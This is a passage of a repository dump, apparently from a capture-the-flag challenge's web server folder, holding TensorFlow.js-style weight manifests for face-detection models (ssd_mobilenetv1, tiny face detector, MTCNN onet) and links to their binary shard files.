:[256]},{"dtype":"float32","name":"onet/prelu5_alpha","shape":[256]},{"dtype":"float32","name":"onet/fc2_1/weights","shape":[256,2]},{"dtype":"float32","name":"onet/fc2_1/bias","shape":[2]},{"dtype":"float32","name":"onet/fc2_2/weights","shape":[256,4]},{"dtype":"float32","name":"onet/fc2_2/bias","shape":[4]},{"dtype":"float32","name":"onet/fc2_3/weights","shape":[256,10]},{"dtype":"float32","name":"onet/fc2_3/bias","shape":[10]}]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-shard2 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/ssd_mobilenetv1_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | [{"paths":["ssd_mobilenetv1_model-shard1","ssd_mobilenetv1_model-shard2"],"weights":[{"dtype":"float32","shape":[1,1,512,9],"quantization":{"scale":0.0026856216729856004,"min":-0.34107395246917127,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/ClassPredictor/weights"},{"dtype":"float32","shape":[9],"quantization":{"scale":0.00198518248165355,"min":-0.32159956202787515,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/ClassPredictor/biases"},{"dtype":"float32","shape":[1,1,1024,18],"quantization":{"scale":0.003060340296988394,"min":-0.489654447518143,"dtype":"uint8"},"name":"Prediction/BoxPredictor_1/ClassPredictor/weights"},{"dtype":"float32","shape":[18],"quantization":{"scale":0.0008040678851744708,"min":-0.12221831854651957,"dtype":"uint8"},"name":"Prediction/BoxPredictor_1/ClassPredictor/biases"},{"dtype":"float32","shape":[1,1,512,18],"quantization":{"scale":0.0012513800578958848,"min":-0.16017664741067325,"dtype":"uint8"},"name":"Prediction/BoxPredictor_2/ClassPredictor/weights"},{"dtype":"float32","shape":[18],"quantization":{"scale":0.000338070518245884,"min":-0.05510549447407909,"dtype":"uint8"},"name":"Prediction/BoxPredictor_2/ClassPredictor/biases"},{"dtype":"float32","shape":[1,1,256,18],"quantization":{"scale":0.0011819932975021064,"min":-0.1453851755927591,"dtype":"uint8"},"name":"Prediction/BoxPredictor_3/ClassPredictor/weights"},{"dtype":"float32","shape":[18],"quantization":{"scale":0.00015985782386041154,"min":-0.026536398760828316,"dtype":"uint8"},"name":"Prediction/BoxPredictor_3/ClassPredictor/biases"},{"dtype":"float32","shape":[1,1,256,18],"quantization":{"scale":0.0007035591438704846,"min":-0.08513065640832863,"dtype":"uint8"},"name":"Prediction/BoxPredictor_4/ClassPredictor/weights"},{"dtype":"float32","shape":[18],"quantization":{"scale":0.00008793946574716008,"min":-0.013190919862074012,"dtype":"uint8"},"name":"Prediction/BoxPredictor_4/ClassPredictor/biases"},{"dtype":"float32","shape":[1,1,128,18],"quantization":{"scale":0.00081320781918133,"min":-0.11059626340866088,"dtype":"uint8"},"name":"Prediction/BoxPredictor_5/ClassPredictor/weights"},{"dtype":"float32","shape":[18],"quantization":{"scale":0.0000980533805547976,"min":-0.014609953702664841,"dtype":"uint8"},"name":"Prediction/BoxPredictor_5/ClassPredictor/biases"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":3,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/stack_1/2"},{"dtype":"int32","shape":[3],"quantization":{"scale":0.00392156862745098,"min":0,"dtype":"uint8"},"name":"Postprocessor/Slice/begin"},{"dtype":"int32","shape":[3],"quantization":{"scale":1,"min":-1,"dtype":"uint8"},"name":"Postprocessor/Slice/size"},{"dtype":"float32","shape":[1,1,512,12],"quantization":{"scale":0.003730384859384275,"min":-0.4327246436885759,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/BoxEncodingPredictor/weights"},{"dtype":"float32","shape":[12],"quantization":{"scale":0.0018744708568442102,"min":-0.3917644090804399,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/BoxEncodingPredictor/biases"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":3072,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/stack_1/1"},{"dtype":"float32","shape":[1,1,1024,24],"quantization":{"scale":0.00157488017689948,"min":-0.20000978246623397,"dtype":"uint8"},"name":"Prediction/BoxPredictor_1/BoxEncodingPredictor/weights"},{"dtype":"float32","shape":[24],"quantization":{"scale":0.0002823906713256649,"min":-0.043488163384152394,"dtype":"uint8"},"name":"Prediction/BoxPredictor_1/BoxEncodingPredictor/biases"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":1536,"dtype":"uint8"},"name":"Prediction/BoxPredictor_1/stack_1/1"},{"dtype":"float32","shape":[1,1,512,24],"quantization":{"scale":0.0007974451663447361,"min":-0.11004743295557358,"dtype":"uint8"},"name":"Prediction/BoxPredictor_2/BoxEncodingPredictor/weights"},{"dtype":"float32","shape":[24],"quantization":{"scale":0.0001350417988849621,"min":-0.02039131163162928,"dtype":"uint8"},"name":"Prediction/BoxPredictor_2/BoxEncodingPredictor/biases"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":384,"dtype":"uint8"},"name":"Prediction/BoxPredictor_2/stack_1/1"},{"dtype":"float32","shape":[1,1,256,24],"quantization":{"scale":0.0007113990246080885,"min":-0.0860792819775787,"dtype":"uint8"},"name":"Prediction/BoxPredictor_3/BoxEncodingPredictor/weights"},{"dtype":"float32","shape":[24],"quantization":{"scale":0.000050115815418608046,"min":-0.007617603943628423,"dtype":"uint8"},"name":"Prediction/BoxPredictor_3/BoxEncodingPredictor/biases"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":96,"dtype":"uint8"},"name":"Prediction/BoxPredictor_3/stack_1/1"},{"dtype":"float32","shape":[1,1,256,24],"quantization":{"scale":0.000590049314732645,"min":-0.06903576982371946,"dtype":"uint8"},"name":"Prediction/BoxPredictor_4/BoxEncodingPredictor/weights"},{"dtype":"float32","shape":[24],"quantization":{"scale":0.00003513663861097074,"min":-0.006359731588585704,"dtype":"uint8"},"name":"Prediction/BoxPredictor_4/BoxEncodingPredictor/biases"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":24,"dtype":"uint8"},"name":"Prediction/BoxPredictor_4/stack_1/1"},{"dtype":"float32","shape":[1,1,128,24],"quantization":{"scale":0.0005990567744946948,"min":-0.07907549423329971,"dtype":"uint8"},"name":"Prediction/BoxPredictor_5/BoxEncodingPredictor/weights"},{"dtype":"float32","shape":[24],"quantization":{"scale":0.00003392884288640583,"min":-0.006039334033780238,"dtype":"uint8"},"name":"Prediction/BoxPredictor_5/BoxEncodingPredictor/biases"},{"dtype":"float32","shape":[],"quantization":{"scale":1,"min":0.007843137718737125,"dtype":"uint8"},"name":"Preprocessor/mul/x"},{"dtype":"int32","shape":[2],"quantization":{"scale":1,"min":512,"dtype":"uint8"},"name":"Preprocessor/ResizeImage/size"},{"dtype":"float32","shape":[],"quantization":{"scale":1,"min":1,"dtype":"uint8"},"name":"Preprocessor/sub/y"},{"dtype":"float32","shape":[3,3,3,32],"quantization":{"scale":0.03948551065781537,"min":-5.014659853542552,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_0_pointwise/weights"},{"dtype":"float32","shape":[32],"quantization":{"scale":0.0498106133704092,"min":-7.371970778820562,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_0_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,32,1],"quantization":{"scale":0.036833542468501075,"min":-4.714693435968138,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_depthwise/depthwise_weights"},{"dtype":"float32","shape":[32],"quantization":{"scale":0.012173276705046495,"min":-0.012173276705046495,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[32],"quantization":{"scale":0.032182769214405736,"min":-2.4780732295092416,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[32],"quantization":{"scale":0.028287527607936486,"min":-3.366215785344442,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[32],"quantization":{"scale":0.04716738532571232,"min":3.9071404665769224e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,32,64],"quantization":{"scale":0.04010109433940812,"min":-4.290817094316669,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_pointwise/weights"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.2212210038129021,"min":-34.51047659481273,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_1_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,64,1],"quantization":{"scale":0.010024750933927648,"min":-1.343316625146305,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_depthwise/depthwise_weights"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.006120916675118839,"min":0.5227176547050476,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.02317035385206634,"min":-0.7646216771181892,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.04980821422502106,"min":-5.8275610643274645,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.051751047022202436,"min":3.916113799002297e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,64,128],"quantization":{"scale":0.021979344124887504,"min":-2.1319963801140878,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.09958663267247816,"min":-11.054116226645077,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_2_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,128,1],"quantization":{"scale":0.01943492702409333,"min":-2.6237151482525993,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_depthwise/depthwise_weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.017852897737540452,"min":0.40204083919525146,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.029888209174661076,"min":-1.972621805527631,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.029319268581913967,"min":-5.130872001834945,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.014018708584355373,"min":3.9083178263362604e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,128,128],"quantization":{"scale":0.020776657964669022,"min":-2.5347522716896207,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.14383157094319662,"min":-9.636715253194174,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_3_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,128,1],"quantization":{"scale":0.004463558571011412,"min":-0.5981168485155293,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_depthwise/depthwise_weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.006487431245691636,"min":0.47910428047180176,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.026542164297664865,"min":-1.2209395576925839,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.05119945675719018,"min":-8.60150873520795,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.03081628388049556,"min":3.911508751095344e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,128,256],"quantization":{"scale":0.010758659886378868,"min":-1.0328313490923713,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.08058219610476026,"min":-9.34753474815219,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_4_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,256,1],"quantization":{"scale":0.01145936741548426,"min":-1.3292866201961742,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/depthwise_weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.0083988838336047,"min":0.36280909180641174,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.02858148649627087,"min":-3.6584302715226715,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.03988401375564874,"min":-7.099354448505476,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.009090481683904049,"min":0.020878996700048447,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,256,256],"quantization":{"scale":0.008951201625898773,"min":-1.1189002032373465,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.051758006974762565,"min":-5.745138774198645,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_5_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,256,1],"quantization":{"scale":0.004110433190476661,"min":-0.6042336790000691,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/depthwise_weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.013170199768216002,"min":0.3386639356613159,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.03599378548416437,"min":-3.70735990486893,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.026967673208199296,"min":-3.748506575939702,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.012615410486857097,"min":3.9111388979838637e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,256,512],"quantization":{"scale":0.00822840648538926,"min":-1.1848905338960536,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.06608965817619772,"min":-7.468131373910342,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_6_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.008801074355256323,"min":-0.9593171047229393,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.030577416513480393,"min":0.3285980224609375,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04778536441279393,"min":-8.935863145192464,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04331884945140165,"min":-9.660103427662568,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04126455444367785,"min":0.000604183878749609,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.009305818408143287,"min":-1.1446156642016243,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04640720217835669,"min":-4.733534622192383,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_7_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.008138792655047248,"min":-0.9766551186056698,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.027351748358969596,"min":0.34030041098594666,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04415061053107767,"min":-7.019947074441349,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.02476683784933651,"min":-2.9224868662217083,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.02547598832684076,"min":0.00026032101595774293,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.01083052625843123,"min":-1.2563410459780227,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.06360894371481503,"min":-7.951117964351878,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_8_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.006704086883395326,"min":-0.8648272079579971,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.015343831567203297,"min":0.2711026668548584,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.03378283930759804,"min":-4.797163181678922,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.021910778213949763,"min":-3.987761634938857,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.009284070410007296,"min":0.000021581046894425526,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.012783036979974485,"min":-1.9046725100161983,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.07273082733154297,"min":-9.52773838043213,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_9_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.006126228033327589,"min":-0.7351473639993107,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.029703759212119908,"min":0.28687000274658203,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.04394429898729511,"min":-6.3279790541704966,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.016566915605582443,"min":-2.7501079905266854,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.012152872833551145,"min":3.913338286370366e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.01354524388032801,"min":-1.7473364605623134,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.08566816367355047,"min":-9.937506986131854,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_10_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.006012305558896532,"min":-0.7876120282154457,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.01469323155926723,"min":0.29223933815956116,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.030889174517463234,"min":-3.2433633243336395,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.014836942448335536,"min":-2.047498057870304,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.007234466105343445,"min":0.00013165915152058005,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,512],"quantization":{"scale":0.016261722527298274,"min":-1.4798167499841428,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.091437328563017,"min":-14.172785927267636,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_11_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,512,1],"quantization":{"scale":0.004750356487199372,"min":-0.650798838746314,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/depthwise_weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.008174965545242907,"min":0.3120670020580292,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.030133422215779623,"min":-2.41067377726237,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.006088157261119169,"min":-0.7853722866843729,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.003668997334498985,"min":3.9124486300013356e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,512,1024],"quantization":{"scale":0.010959514449624454,"min":-1.4028178495519301,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_pointwise/weights"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.10896045834410424,"min":-14.818622334798176,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_12_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,1024,1],"quantization":{"scale":0.004633033509347953,"min":-0.5652300881404502,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/depthwise_weights"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.022285057224479377,"min":0.23505790531635284,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/gamma"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.0324854850769043,"min":-3.9957146644592285,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/beta"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.014760061806323482,"min":-2.125448900110581,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/moving_mean"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.0036057423142825855,"min":3.9067056828997994e-36,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_depthwise/BatchNorm/moving_variance"},{"dtype":"float32","shape":[1,1,1024,1024],"quantization":{"scale":0.017311988157384536,"min":-2.094750567043529,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_pointwise/weights"},{"dtype":"float32","shape":[1024],"quantization":{"scale":0.16447528764313343,"min":-25.658144872328815,"dtype":"uint8"},"name":"MobilenetV1/Conv2d_13_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,1024,256],"quantization":{"scale":0.0026493051472832175,"min":-0.36825341547236723,"dtype":"uint8"},"name":"Prediction/Conv2d_0_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.012474596734140433,"min":-2.3078003958159803,"dtype":"uint8"},"name":"Prediction/Conv2d_0_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,256,512],"quantization":{"scale":0.014533351449405445,"min":-1.8166689311756807,"dtype":"uint8"},"name":"Prediction/Conv2d_1_pointwise/weights"},{"dtype":"float32","shape":[512],"quantization":{"scale":0.024268776762719248,"min":-2.4754152297973633,"dtype":"uint8"},"name":"Prediction/Conv2d_1_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,512,128],"quantization":{"scale":0.002208403746287028,"min":-0.28709248701731366,"dtype":"uint8"},"name":"Prediction/Conv2d_2_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.012451349052728392,"min":-1.5937726787492341,"dtype":"uint8"},"name":"Prediction/Conv2d_2_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,128,256],"quantization":{"scale":0.026334229637594783,"min":-2.8967652601354263,"dtype":"uint8"},"name":"Prediction/Conv2d_3_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.02509917792151956,"min":-1.4055539636050953,"dtype":"uint8"},"name":"Prediction/Conv2d_3_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,256,128],"quantization":{"scale":0.004565340046789132,"min":-0.3971845840706545,"dtype":"uint8"},"name":"Prediction/Conv2d_4_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.017302456556581983,"min":-2.5953684834872974,"dtype":"uint8"},"name":"Prediction/Conv2d_4_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,128,256],"quantization":{"scale":0.025347338470758176,"min":-3.8527954475552426,"dtype":"uint8"},"name":"Prediction/Conv2d_5_pointwise/weights"},{"dtype":"float32","shape":[256],"quantization":{"scale":0.033134659598855414,"min":-2.9158500446992766,"dtype":"uint8"},"name":"Prediction/Conv2d_5_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[1,1,256,64],"quantization":{"scale":0.002493104397081861,"min":-0.2817207968702503,"dtype":"uint8"},"name":"Prediction/Conv2d_6_pointwise/weights"},{"dtype":"float32","shape":[64],"quantization":{"scale":0.011383360974928912,"min":-1.2749364291920382,"dtype":"uint8"},"name":"Prediction/Conv2d_6_pointwise/convolution_bn_offset"},{"dtype":"float32","shape":[3,3,64,128],"quantization":{"scale":0.020821522731407017,"min":-2.7484410005457263,"dtype":"uint8"},"name":"Prediction/Conv2d_7_pointwise/weights"},{"dtype":"float32","shape":[128],"quantization":{"scale":0.052144218893612135,"min":-3.5979511036592373,"dtype":"uint8"},"name":"Prediction/Conv2d_7_pointwise/convolution_bn_offset"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":6,"dtype":"uint8"},"name":"Prediction/BoxPredictor_5/stack_1/1"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":1,"dtype":"uint8"},"name":"concat_1/axis"},{"dtype":"int32","shape":[1],"quantization":{"scale":1,"min":0,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/strided_slice/stack"},{"dtype":"int32","shape":[1],"quantization":{"scale":1,"min":1,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/strided_slice/stack_1"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":5118,"dtype":"uint8"},"name":"Postprocessor/stack/1"},{"dtype":"int32","shape":[],"quantization":{"scale":1,"min":4,"dtype":"uint8"},"name":"Prediction/BoxPredictor_0/stack/3"},{"dtype":"float32","shape":[1, 5118, 4],"name":"Output/extra_dim"}]}] -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/tiny_face_detector_model-shard1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/src/d3_trusted_core/mini_httpd-1.30/www/weights/tiny_face_detector_model-shard1 -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/www/weights/tiny_face_detector_model-weights_manifest.json: -------------------------------------------------------------------------------- 1 | 